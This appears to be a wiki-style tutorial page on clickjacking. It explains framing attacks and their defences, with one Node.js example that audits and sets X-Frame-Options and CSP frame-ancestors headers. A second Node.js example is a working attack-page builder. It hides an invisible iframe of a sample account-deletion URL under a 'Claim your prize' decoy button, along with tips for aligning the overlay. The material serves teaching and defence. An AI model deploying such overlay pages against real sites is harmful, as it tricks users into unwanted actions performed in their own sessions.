Security Clickjacking Introduction
// Security - Clickjacking:
Clickjacking (also called UI redressing) tricks users into thinking they are
clicking or typing on one object while they are actually interacting with
another. The attacker loads the target domain in an iframe on a page they
control. If that iframe is rendered with an opacity of zero, the user is not
aware it is there: the browser still delivers clicks and keystrokes to the
invisible frame, and still sends the target site's cookies with any request the
frame makes (unless the cookie's SameSite attribute withholds it from cross-site
frames), so the user ends up performing an action on the target domain in their
own session without realizing it.
The traditional countermeasure is frame-busting: a script in the page that
checks whether it has been framed (top !== self) and navigates the top window
to its own URL. Frame-busting is unreliable, because the attacker can load the
page in an iframe whose sandbox attribute omits allow-top-navigation, which
stops the script from redirecting. The dependable fix is to have the browser
refuse to frame the page at all, with an X-Frame-Options: DENY (or SAMEORIGIN)
response header and, in current browsers, the Content-Security-Policy
frame-ancestors directive, which takes precedence over X-Frame-Options when both
are present. Cookies marked SameSite=Lax or Strict are not sent to a cross-site
frame, which blunts the attack on sessions that rely on them, but that is a
property of the cookie rather than a framing policy and should not be relied on
alone.
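The following is an added example, not code from the original page. It places the classic frame-buster beside the header-based policy, evaluates a response's framing policy the way a browser would (CSP frame-ancestors first, then X-Frame-Options), and applies the hardened headers to a response object. It runs under Node.js with no dependencies; the header sets in SAMPLE_RESPONSES are constructed samples, not captured from any real site.

```javascript
// Added example: frame-busting versus header-based framing policy.
// Assumes Node.js; all sample headers below are constructed.

// The classic frame-buster. It only helps when the script executes and may
// navigate the top window. An attacker who frames the page with
// <iframe sandbox="allow-forms allow-scripts" src="..."> withholds
// allow-top-navigation, so the assignment to top.location is refused and the
// page stays framed.
const FRAME_BUSTER = "if (top !== self) { top.location = self.location; }";

// Decide whether a response may be framed, from its headers alone.
// Header names are matched case-insensitively. When a Content-Security-Policy
// with frame-ancestors is present, browsers ignore X-Frame-Options, so the
// CSP directive is checked first.
function framingPolicy(headers) {
  const h = {};
  for (const [name, value] of Object.entries(headers)) {
    h[name.toLowerCase()] = String(value);
  }

  const csp = h["content-security-policy"];
  if (csp) {
    const directive = csp
      .split(";")
      .map((d) => d.trim())
      .find((d) => /^frame-ancestors(\s|$)/i.test(d));
    if (directive) {
      const sources = directive.split(/\s+/).slice(1);
      // An empty source list or 'none' means nobody may frame the page.
      if (sources.length === 0 || sources.some((s) => s.toLowerCase() === "'none'")) {
        return { protected: true, via: "csp", allowed: [], reason: "frame-ancestors forbids framing" };
      }
      return { protected: true, via: "csp", allowed: sources, reason: "frame-ancestors restricts framing" };
    }
  }

  const xfo = h["x-frame-options"];
  if (xfo !== undefined) {
    const value = xfo.trim().toUpperCase();
    if (value === "DENY") {
      return { protected: true, via: "xfo", allowed: [], reason: "X-Frame-Options: DENY" };
    }
    if (value === "SAMEORIGIN") {
      return { protected: true, via: "xfo", allowed: ["'self'"], reason: "X-Frame-Options: SAMEORIGIN" };
    }
    // ALLOW-FROM and any other value are not honoured by current browsers,
    // which then apply no restriction at all.
    return { protected: false, via: "xfo", allowed: null, reason: "unsupported X-Frame-Options value: " + xfo };
  }

  return { protected: false, via: null, allowed: null, reason: "no framing restriction" };
}

// Apply the hardened policy to any response object exposing setHeader()
// (Node's http.ServerResponse does). Both headers are set: frame-ancestors for
// current browsers, X-Frame-Options for old ones. X-Frame-Options cannot
// express an allow-list, so SAMEORIGIN is used whenever ancestors are allowed;
// legacy browsers then refuse third-party framing while current browsers
// honour the CSP list.
function setFramingHeaders(res, allowedAncestors = []) {
  const sources = allowedAncestors.length === 0 ? "'none'" : allowedAncestors.join(" ");
  res.setHeader("Content-Security-Policy", "frame-ancestors " + sources);
  res.setHeader("X-Frame-Options", allowedAncestors.length === 0 ? "DENY" : "SAMEORIGIN");
  return res;
}

// Constructed sample header sets, as a target site might send them.
const SAMPLE_RESPONSES = {
  unprotected: { "Content-Type": "text/html" },
  legacyOnly: { "X-Frame-Options": "deny" },
  cspWins: {
    "X-Frame-Options": "DENY",
    "Content-Security-Policy": "default-src 'self'; frame-ancestors 'self' https://partner.example",
  },
};

// Summarise a set of responses: name -> whether framing is restricted.
function auditResponses(samples) {
  const result = {};
  for (const [name, headers] of Object.entries(samples)) {
    result[name] = framingPolicy(headers).protected;
  }
  return result;
}

console.log(auditResponses(SAMPLE_RESPONSES));
```

The round trip matters: the headers setFramingHeaders() writes are exactly what framingPolicy() accepts, so the checker doubles as a regression test for a deployment's own responses.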
Clickjacking is a common web application vulnerability. The name dates from
2008, and the attack still works against any site that does not set a framing
policy. An attacker uses it to make users think they are interacting with one
object while they are actually interacting with another.
On a clickjacked page the attacker displays some benign content to the user
while loading the target page on top of it in a transparent layer. The user
thinks they are clicking buttons on the visible bottom layer, while they are
actually performing actions on the hidden page on top. It resembles cross-site
request forgery in that the user's own browser, carrying the user's own session,
performs an action on the target site that the user never knowingly chose.
The attacker includes an iframe on this page that references a page on the
target site containing the form or button they want the user to operate. The
user does not see this form because the attacker has set the transparency of
the iframe to 0, making it invisible. Next, the attacker sets the iframe's CSS
properties (absolute positioning, a negative offset, and a higher z-index) so
that the target's button sits directly on top of the decoy button. When the
user clicks the decoy, the click actually lands on the transparent iframe above
it.
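The following is an added example, not code from the original page. It builds the attacker page described above and shows the arithmetic that lands the target site's hidden button exactly under the visible decoy, plus a helper that maps a click on the attacker page to coordinates inside the framed page. It runs under Node.js; VICTIM_URL, the viewport size and every coordinate are constructed sample values, not measurements of any real site.

```javascript
// Added example: positioning the transparent iframe over the decoy.
// Assumes Node.js; the URL and all coordinates below are constructed.

// Where the sensitive button sits inside the target page (CSS px from the
// page's top-left), as the attacker would measure it in their own browser at
// the viewport size used below. Constructed values.
const VICTIM_URL = "https://victim.example/account/delete";
const VIEWPORT = { width: 1280, height: 2000 };
const TARGET_BUTTON = { left: 480, top: 910, width: 140, height: 44 };

// Where the decoy button is drawn on the attacker's page. Constructed values.
const DECOY = { left: 300, top: 200, width: 140, height: 44 };

// Overlay geometry: a wrapper div the size of the decoy clips the iframe, and
// the iframe is shifted by negative offsets so that the target button is the
// only part of the framed page visible inside the wrapper.
function alignOverlay(target, decoy) {
  return {
    wrapper: { left: decoy.left, top: decoy.top, width: decoy.width, height: decoy.height },
    iframe: { left: -target.left, top: -target.top },
  };
}

// Translate a click on the attacker page into target-page coordinates.
// Returns null when the click falls outside the clipped overlay (it then hits
// the attacker's own content, not the iframe).
function mapClickToVictim(point, target, decoy) {
  const { wrapper, iframe } = alignOverlay(target, decoy);
  const inWrapper =
    point.x >= wrapper.left && point.x < wrapper.left + wrapper.width &&
    point.y >= wrapper.top && point.y < wrapper.top + wrapper.height;
  if (!inWrapper) return null;
  return { x: point.x - wrapper.left - iframe.left, y: point.y - wrapper.top - iframe.top };
}

// Does a click at this point on the attacker page land on the target button?
function hitsTargetButton(point, target, decoy) {
  const v = mapClickToVictim(point, target, decoy);
  return v !== null &&
    v.x >= target.left && v.x < target.left + target.width &&
    v.y >= target.top && v.y < target.top + target.height;
}

// Render the attacker page. opacity:0 keeps the iframe invisible while it still
// receives pointer events; z-index puts it above the decoy. Raising opacity to
// 0.5 while developing the attack makes the alignment visible.
function buildClickjackPage(victimUrl, target, decoy, viewport, opacity = 0) {
  const { wrapper, iframe } = alignOverlay(target, decoy);
  const px = (n) => `${n}px`;
  return [
    "<!doctype html>",
    "<html><body>",
    `<button style="position:absolute;left:${px(decoy.left)};top:${px(decoy.top)};` +
      `width:${px(decoy.width)};height:${px(decoy.height)}">Claim your prize</button>`,
    `<div style="position:absolute;left:${px(wrapper.left)};top:${px(wrapper.top)};` +
      `width:${px(wrapper.width)};height:${px(wrapper.height)};overflow:hidden;z-index:2">`,
    `<iframe src="${victimUrl}" style="position:absolute;left:${px(iframe.left)};top:${px(iframe.top)};` +
      `width:${px(viewport.width)};height:${px(viewport.height)};border:0;opacity:${opacity}"></iframe>`,
    "</div>",
    "</body></html>",
  ].join("\n");
}

console.log(buildClickjackPage(VICTIM_URL, TARGET_BUTTON, DECOY, VIEWPORT));
```

The clipping wrapper is what makes the attack precise: without it, every other control on the framed page is also invisibly clickable, and a stray click anywhere on the attacker's page might land on something unintended. The same geometry explains why the header-based defenses work, since a browser that refuses to render the frame leaves nothing under the decoy to click.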
page revision: 0, last edited: 01 Jan 2017 22:25